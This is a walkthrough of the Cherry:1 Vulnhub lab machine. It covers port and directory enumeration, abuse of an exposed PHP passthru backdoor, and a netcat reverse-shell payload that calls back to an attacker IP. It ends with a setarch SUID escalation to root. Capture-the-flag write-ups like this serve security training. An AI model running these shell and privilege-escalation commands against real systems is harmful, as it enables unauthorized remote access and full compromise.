Cherry 1 Vulnhub Walkthrough
Today, I will be sharing a walkthrough of Cherry:1 which is a boot2root VM available on Vulnhub created by SunCSR Team.
data:image/s3,"s3://crabby-images/20b6b/20b6bd34ca8aa1e85580c132c6c6e03540a35ec4" alt="Cherry 1 Vulnhub Walkthrough"
Enumeration and Initial Shell
I started with a Nmap full port scan to look for open ports and default scripts.
nmap -sC -sV -p- -oN nmap/all-ports 192.168.1.48
data:image/s3,"s3://crabby-images/de1d4/de1d40de6af7cad8ac153fc56dd07327586a5d36" alt=""
We can see four different ports open. Port 80 is running a nginx web server and port 7755 is running an Apache web server. Let's open our web browser and look at both these ports.
data:image/s3,"s3://crabby-images/6d1d2/6d1d25851e36a038b3968cf5f0dc8e9a1515fcef" alt=""
data:image/s3,"s3://crabby-images/8e5ed/8e5edbed97cb44041f66780dfa87a96ccdf7ada2" alt=""
Both of these look similar, Next I performed a Gobuster scan on port 7755 to look for hidden files and directories.
gobuster dir -u http://192.168.1.48:7755 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.html
data:image/s3,"s3://crabby-images/e0269/e0269cf6d6fd0a9b01e8225857225370e340da8d" alt=""
We can see a /backup directory. If we check in the browser, we see that it has directory listing enabled.
data:image/s3,"s3://crabby-images/11c44/11c449faea6e2c8b7415262a7bd5aafd0d42f8ac" alt=""
I downloaded all these files and started enumerating one by one. The command.php file is interesting. It is using a passthru function which can be used to execute system commands.
<?php echo passthru($_GET['backup']); ?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Backup</title>
</head>
<body>
<!-- </?php echo passthru($_GET['backup']); ?/> -->
</body>
</html>
I tested it by executing the id
command and it returns the id of the user.
data:image/s3,"s3://crabby-images/e018a/e018ab20d36aef3bb7b5b5e637deb19228a19066" alt=""
Awesome, Now we can execute a reverse shell with the same method by using the following payload:
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.1.4+9001+>/tmp/f
data:image/s3,"s3://crabby-images/ffda4/ffda4f9757bdbb94709f4b2b04abac4af47c84ed" alt=""
As soon as I got the connection, I upgraded the dumb shell to fully interactive TTY using the following commands:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo && fg
reset
Ctrl+D
export TERM=xterm-256color
stty rows 42
stty columns 149
data:image/s3,"s3://crabby-images/0018c/0018c41764d3c003e9773250ba2134aae7ee29c9" alt=""
Privilege Escalation
The privilege escalation part is easy, we just need to exploit a SUID to get root. First, let's check all the SUIDs available.
find / -perm -u=s -type f 2>/dev/null
data:image/s3,"s3://crabby-images/e968c/e968c13cc8f1c9b86bec89d5d1c7e02f3b9c88b4" alt=""
We can see a SUID named setarch. Looking at the GTFO Bins, I found that we can get root by using the following command:
setarch $(arch) /bin/sh -p
Once we are root, we can read our flag present in the /root directory.
data:image/s3,"s3://crabby-images/4c8b9/4c8b99e731a178043fbb297fcace537abc2cc0a1" alt=""
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by William Truran.